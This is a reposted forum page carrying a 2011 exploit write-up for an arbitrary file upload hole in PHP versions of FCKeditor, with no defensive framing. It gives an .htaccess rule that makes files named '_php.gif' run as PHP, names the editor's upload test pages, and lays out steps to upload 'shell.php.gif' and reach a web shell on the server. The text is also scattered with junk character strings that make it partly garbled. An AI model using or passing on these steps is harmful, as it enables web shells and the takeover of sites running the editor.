FCKeditor所有php版本Upload上传漏洞
' P, P7 U q5 K作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:074 F8 ^% y8 k: B
减小字体 增大字体 q3 B7 E8 D$ q l. P
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
% l7 W$ r& v7 J* u[+] Date: 2011
8 s) W( }* a- Z; e[+] Author : sinesafe.cn
`; d8 e) m3 Q[+] Website : WwW.sinesafe.cn
3 o9 h l) k6 {5 D———————————————————1 H) a5 G/ C) q, L d
1.create a htaccess file:/ |/ e6 i4 g' z9 O0 Z
code:9 D/ g- p/ K9 M
<FilesMatch “_php.gif”>- Y. a5 |' f# u/ i% {( r1 A
SetHandler application/x-httpd-php+ K) c7 g2 Z6 D4 x. b J
</FilesMatch>
4 d! [( ]/ j6 t: ]8 v; T: F, {9 \+ G& O
2.Now upload this htaccess with FCKeditor.
3 G- W- r0 _9 J5 G5 q. C, u( P9 o* I
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html, M) r9 G- H g- ^0 E8 p$ \% W
- O8 Z' x2 ?! W" J/ p1 S$ u, K
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html: m, {: O: y1 _ k6 `, e" d
) e f$ Z! o) t. R
———————————————————————————————-
) N* P @ Z% u* l* z3 r: v) k3.Now upload shell.php.gif with FCKeditor.
7 _$ U( i: q+ s5 t$ A4 R- U+ |6 O" O4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
2 b! m& w( I2 c5.http://www.sinesafe.cn/anything/shell_php.gif8 y C X3 n; b( o
6.Now shell is available from server. |
" b4 W3 V# e6 y* ^3 Z" v3 D7 }
5 b4 v4 T. C$ n5 N
1 X) U0 C" U/ o; U. f |
发表于 2013-10-27 17:25:21
收藏
支持
反对